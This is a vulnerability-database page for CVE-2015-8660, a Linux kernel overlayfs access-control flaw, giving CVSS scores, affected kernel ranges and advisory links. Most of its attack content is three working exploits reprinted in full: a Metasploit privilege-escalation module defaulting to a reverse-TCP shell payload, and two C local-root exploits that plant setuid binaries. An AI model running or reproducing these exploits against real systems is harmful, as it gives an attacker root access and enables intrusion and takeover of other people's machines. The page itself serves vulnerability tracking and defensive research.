CVE-2015-8660 : Detail

CVE-2015-8660

6.7
/
Medium
A01-Broken Access Control
0.12%V3
Local
2015-12-28
10h00 +00:00
2017-09-09
07h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 6.7 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable component allowing access to component-wide settings and files.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 [email protected]
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 40688

Publication date : 2016-11-01 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require "msf/core" class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Overlayfs Privilege Escalation', 'Description' => %q{ This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested) }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die <[email protected]>', # Module 'rebel' # Discovery ], 'DisclosureDate' => 'Jun 16 2015', 'Platform' => [ 'linux'], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'CVE-2015-1328', { } ], [ 'CVE-2015-8660', { } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su }, 'References' => [ [ 'EDB', '39166'], # CVE-2015-8660 [ 'EDB', '37292'], # CVE-2015-1328 [ 'CVE', '2015-1328'], [ 'CVE', '2015-8660'] ] )) register_options( [ OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) ], self.class) end def check def mounts_exist?() vprint_status('Checking if mount points exist') if target.name == 'CVE-2015-1328' if not directory?('/tmp/ns_sploit') vprint_good('/tmp/ns_sploit not created') return true else print_error('/tmp/ns_sploit directory exists. Please delete.') return false end elsif target.name == 'CVE-2015-8660' if not directory?('/tmp/haxhax') vprint_good('/tmp/haxhax not created') return true else print_error('/tmp/haxhax directory exists. Please delete.') return false end end end def kernel_vuln?() os_id = cmd_exec('grep ^ID= /etc/os-release') case os_id when 'ID=ubuntu' kernel = Gem::Version.new(cmd_exec('/bin/uname -r')) case kernel.release.to_s when '3.13.0' if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic')) vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") return true else print_error("Kernel #{kernel} is NOT vulnerable") return false end when '3.16.0' if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic')) vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") return true else print_error("Kernel #{kernel} is NOT vulnerable") return false end when '3.19.0' if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic')) vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") return true elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic')) vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660") return true else print_error("Kernel #{kernel} is NOT vulnerable") return false end when '4.2.0' if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic')) vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660") return true else print_error("Kernel #{kernel} is NOT vulnerable") return false end else print_error("Non-vuln kernel #{kernel}") return false end when 'ID=fedora' kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the trailer after .fc # irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '') # => "4.0.4-301" if kernel.release < Gem::Version.new('4.2.8') vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660. Exploitation UNTESTED") return true else print_error("Non-vuln kernel #{kernel}") return false end else print_error("Unknown OS: #{os_id}") return false end end if mounts_exist?() && kernel_vuln?() return CheckCode::Appears else return CheckCode::Safe end end def exploit if check != CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') end filename = rand_text_alphanumeric(8) executable_path = "#{datastore['WritableDir']}/#{filename}" payloadname = rand_text_alphanumeric(8) payload_path = "#{datastore['WritableDir']}/#{payloadname}" def has_prereqs?() gcc = cmd_exec('which gcc') if gcc.include?('gcc') vprint_good('gcc is installed') else print_error('gcc is not installed. Compiling will fail.') end return gcc.include?('gcc') end compile = false if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' if has_prereqs?() compile = true vprint_status('Live compiling exploit on system') else vprint_status('Dropping pre-compiled exploit on system') end end if check != CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') end def upload_and_chmod(fname, fcontent, cleanup=true) print_status "Writing to #{fname} (#{fcontent.size} bytes)" rm_f fname write_file(fname, fcontent) cmd_exec("chmod +x #{fname}") if cleanup register_file_for_cleanup(fname) end end def on_new_session(session) super if target.name == 'CVE-2015-1328' session.shell_command("/bin/su") #this doesnt work on meterpreter????? # we cleanup here instead of earlier since we needed the /bin/su in our new session session.shell_command('rm -f /etc/ld.so.preload') session.shell_command('rm -f /tmp/ofs-lib.so') end end if compile begin if target.name == 'CVE-2015-1328' # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size # Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary. path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c') fd = ::File.open( path, "rb") cve_2015_1328 = fd.read(fd.stat.size) fd.close # pulled out from 1328.c's LIB define path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c') fd = ::File.open( path, "rb") ofs_lib = fd.read(fd.stat.size) fd.close else # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c') fd = ::File.open( path, "rb") cve_2015_8660 = fd.read(fd.stat.size) fd.close end rescue compile = false #hdm said external folder is optional and all module should run even if external is deleted. If we fail to load, default to binaries end end if compile if target.name == 'CVE-2015-1328' cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/, "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);") upload_and_chmod("#{executable_path}.c", cve_2015_1328) ofs_path = "#{datastore['WritableDir']}/ofs-lib" upload_and_chmod("#{ofs_path}.c", ofs_lib) cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file register_file_for_cleanup("#{ofs_path}.c") else cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/, "os.execl('#{payload_path}','#{payloadname}')") upload_and_chmod("#{executable_path}.c", cve_2015_8660) end vprint_status("Compiling #{executable_path}.c") cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile register_file_for_cleanup(executable_path) else if target.name == 'CVE-2015-1328' path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328') fd = ::File.open( path, "rb") cve_2015_1328 = fd.read(fd.stat.size) fd.close upload_and_chmod(executable_path, cve_2015_1328) path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so') fd = ::File.open( path, "rb") ofs_lib = fd.read(fd.stat.size) fd.close ofs_path = "#{datastore['WritableDir']}/ofs-lib" # dont auto cleanup or else it happens too quickly and we never escalate ourprivs upload_and_chmod("#{ofs_path}.so", ofs_lib, false) # overwrite with the hardcoded variable names in the compiled versions payload_filename = 'lXqzVpYN' payload_path = '/tmp/lXqzVpYN' else path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660') fd = ::File.open( path, "rb") cve_2015_8660 = fd.read(fd.stat.size) fd.close upload_and_chmod(executable_path, cve_2015_8660) # overwrite with the hardcoded variable names in the compiled versions payload_filename = '1H0qLaq2' payload_path = '/tmp/1H0qLaq2' end end upload_and_chmod(payload_path, generate_payload_exe) vprint_status('Exploiting...') output = cmd_exec(executable_path) output.each_line { |line| vprint_status(line.chomp) } end end
Exploit Database EDB-ID : 39166

Publication date : 2016-01-04 23h00 +00:00
Author : rebel
EDB Verified : Yes

/* just another overlayfs exploit, works on kernels before 2015-12-26 # Exploit Title: overlayfs local root # Date: 2016-01-05 # Exploit Author: rebel # Version: Ubuntu 14.04 LTS, 15.10 and more # Tested on: Ubuntu 14.04 LTS, 15.10 # CVE : CVE-2015-8660 blah@ubuntu:~$ id uid=1001(blah) gid=1001(blah) groups=1001(blah) blah@ubuntu:~$ uname -a && cat /etc/issue Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Ubuntu 14.04.3 LTS \n \l blah@ubuntu:~$ ./overlayfail root@ubuntu:~# id uid=0(root) gid=1001(blah) groups=0(root),1001(blah) 12/2015 by rebel 6354b4e23db225b565d79f226f2e49ec0fe1e19b */ #include <stdio.h> #include <sched.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #include <sys/wait.h> static char child_stack[1024*1024]; static int child_exec(void *stuff) { system("rm -rf /tmp/haxhax"); mkdir("/tmp/haxhax", 0777); mkdir("/tmp/haxhax/w", 0777); mkdir("/tmp/haxhax/u",0777); mkdir("/tmp/haxhax/o",0777); if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) { fprintf(stderr,"mount failed..\n"); } chmod("/tmp/haxhax/w/work",0777); chdir("/tmp/haxhax/o"); chmod("bash",04755); chdir("/"); umount("/tmp/haxhax/o"); return 0; } int main(int argc, char **argv) { int status; pid_t wrapper, init; int clone_flags = CLONE_NEWNS | SIGCHLD; struct stat s; if((wrapper = fork()) == 0) { if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); if((init = fork()) == 0) { pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); if(pid < 0) { fprintf(stderr, "failed to create new mount namespace\n"); exit(-1); } waitpid(pid, &status, 0); } waitpid(init, &status, 0); return 0; } usleep(300000); wait(NULL); stat("/tmp/haxhax/u/bash",&s); if(s.st_mode == 0x89ed) execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL); fprintf(stderr,"couldn't create suid :(\n"); return -1; }
Exploit Database EDB-ID : 39230

Publication date : 2016-01-11 23h00 +00:00
Author : halfdog
EDB Verified : No

/** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall the copyright owner be * liable for any direct, indirect, incidential, special, exemplary or * consequential damages, including, but not limited to, procurement * of substitute goods or services, loss of use, data or profits or * business interruption, however caused and on any theory of liability, * whether in contract, strict liability, or tort, including negligence * or otherwise, arising in any way out of the use of this software, * even if advised of the possibility of such damage. * * Copyright (c) 2015 halfdog <me (%) halfdog.net> * * This program demonstrates how to escalate privileges using * an overlayfs mount within a user namespace. See * http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ * for more information. * * gcc -o UserNamespaceOverlayfsSetuidWriteExec UserNamespaceOverlayfsSetuidWriteExec.c * * Usage: UserNamespaceOverlayfsSetuidWriteExec -- [program] [args] * */ #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <sched.h> #include <sys/stat.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mount.h> #include <sys/resource.h> #include <sys/wait.h> #include <unistd.h> extern char **environ; static int childFunc(void *arg) { fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid()); while(geteuid()!=0) { usleep(100); } fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid()); int result=mount("overlayfs", "/tmp/x/bin", "overlayfs", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/x/over,workdir=/tmp/x/bin"); if(result) { fprintf(stderr, "Overlay mounting failed: %d (%s)\n", errno, strerror(errno)); return(1); } chdir("/tmp/x/bin"); result=chmod("su", 04777); if(result) { fprintf(stderr, "Mode change failed\n"); return(1); } fprintf(stderr, "Namespace helper waiting for modification completion\n"); struct stat statBuf; char checkPath[128]; sprintf(checkPath, "/proc/%d", getppid()); while(1) { usleep(100); result=stat(checkPath, &statBuf); if(result) { fprintf(stderr, "Namespacer helper: parent terminated\n"); break; } // Wait until parent has escalated. if(statBuf.st_uid) break; } chdir("/"); umount("/tmp/x/bin"); unlink("/tmp/x/over/su"); rmdir("/tmp/x/over"); rmdir("/tmp/x/bin/work"); rmdir("/tmp/x/bin"); rmdir("/tmp/x/"); fprintf(stderr, "Namespace part completed\n"); return(0); } #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; int main(int argc, char *argv[]) { int argPos; int result; char *targetSuidPath="/bin/su"; char *helperSuidPath="/bin/mount"; for(argPos=1; argPos<argc; argPos++) { char *argName=argv[argPos]; if(!strcmp(argName, "--")) { argPos++; break; } if(strncmp(argName, "--", 2)) { break; } fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName); exit(1); } mkdir("/tmp/x", 0700); mkdir("/tmp/x/bin", 0700); mkdir("/tmp/x/over", 0700); // Create child; child commences execution in childFunc() // CLONE_NEWNS: new mount namespace // CLONE_NEWPID // CLONE_NEWUTS pid_t pid=clone(childFunc, child_stack+STACK_SIZE, CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, argv+argPos); if(pid==-1) { fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno)); return(1); } char idMapFileName[128]; char idMapData[128]; sprintf(idMapFileName, "/proc/%d/setgroups", pid); int setGroupsFd=open(idMapFileName, O_WRONLY); if(setGroupsFd<0) { fprintf(stderr, "Failed to open setgroups\n"); return(1); } result=write(setGroupsFd, "deny", 4); if(result<0) { fprintf(stderr, "Failed to disable setgroups\n"); return(1); } close(setGroupsFd); sprintf(idMapFileName, "/proc/%d/uid_map", pid); fprintf(stderr, "Setting uid map in %s\n", idMapFileName); int uidMapFd=open(idMapFileName, O_WRONLY); if(uidMapFd<0) { fprintf(stderr, "Failed to open uid map\n"); return(1); } sprintf(idMapData, "0 %d 1\n", getuid()); result=write(uidMapFd, idMapData, strlen(idMapData)); if(result<0) { fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno)); return(1); } close(uidMapFd); sprintf(idMapFileName, "/proc/%d/gid_map", pid); fprintf(stderr, "Setting gid map in %s\n", idMapFileName); int gidMapFd=open(idMapFileName, O_WRONLY); if(gidMapFd<0) { fprintf(stderr, "Failed to open gid map\n"); return(1); } sprintf(idMapData, "0 %d 1\n", getgid()); result=write(gidMapFd, idMapData, strlen(idMapData)); if(result<0) { fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno)); return(1); } close(gidMapFd); // Wait until /tmp/x/over/su exists struct stat statBuf; while(1) { usleep(100); result=stat("/tmp/x/over/su", &statBuf); if(!result) break; } // Overwrite the file sprintf(idMapFileName, "/proc/%d/cwd/su", pid); // No slashes allowed, everything else is OK. char suidExecMinimalElf[] = { 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00, 0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00, 0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08, 0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8, 0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0, 0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80 }; char *helperArgs[]={"/bin/mount", NULL}; int destFd=open(idMapFileName, O_RDWR|O_CREAT|O_TRUNC, 07777); if(destFd<0) { fprintf(stderr, "Failed to open %s, error %s\n", idMapFileName, strerror(errno)); return(1); } char *suidWriteNext=suidExecMinimalElf; char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf); while(suidWriteNext!=suidWriteEnd) { char *suidWriteTestPos=suidWriteNext; while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd)) suidWriteTestPos++; // We cannot write any 0-bytes. So let seek fill up the file wihh // null-bytes for us. lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET); suidWriteNext=suidWriteTestPos; while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd)) suidWriteTestPos++; pid_t helperPid=fork(); if(!helperPid) { struct rlimit limits; // We can't truncate, that would remove the setgid property of // the file. So make sure the SUID binary does not write too much. limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf; limits.rlim_max=limits.rlim_cur; setrlimit(RLIMIT_FSIZE, &limits); // Do not rely on some SUID binary to print out the unmodified // program name, some OSes might have hardening against that. // Let the ld-loader will do that for us. limits.rlim_cur=1<<22; limits.rlim_max=limits.rlim_cur; result=setrlimit(RLIMIT_AS, &limits); dup2(destFd, 1); dup2(destFd, 2); helperArgs[0]=suidWriteNext; execve(helperSuidPath, helperArgs, NULL); fprintf(stderr, "Exec failed\n"); return(1); } waitpid(helperPid, NULL, 0); suidWriteNext=suidWriteTestPos; } close(destFd); execve(idMapFileName, argv+argPos-1, NULL); fprintf(stderr, "Failed to execute %s: %d (%s)\n", idMapFileName, errno, strerror(errno)); return(1); }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version From (including) 3.18 To (excluding) 3.18.31

Linux>>Linux_kernel >> Version From (including) 3.19 To (excluding) 4.1.22

Linux>>Linux_kernel >> Version From (including) 4.2 To (excluding) 4.4

References

https://www.exploit-db.com/exploits/39166/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id/1034548
Tags : vdb-entry, x_refsource_SECTRACK
http://rhn.redhat.com/errata/RHSA-2016-1541.html
Tags : vendor-advisory, x_refsource_REDHAT
https://www.exploit-db.com/exploits/40688/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.openwall.com/lists/oss-security/2015/12/23/5
Tags : mailing-list, x_refsource_MLIST
http://rhn.redhat.com/errata/RHSA-2016-1539.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.ubuntu.com/usn/USN-2857-2
Tags : vendor-advisory, x_refsource_UBUNTU
http://rhn.redhat.com/errata/RHSA-2016-1532.html
Tags : vendor-advisory, x_refsource_REDHAT
https://www.exploit-db.com/exploits/39230/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.ubuntu.com/usn/USN-2858-2
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.ubuntu.com/usn/USN-2858-3
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.ubuntu.com/usn/USN-2858-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.ubuntu.com/usn/USN-2857-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.securityfocus.com/bid/79671
Tags : vdb-entry, x_refsource_BID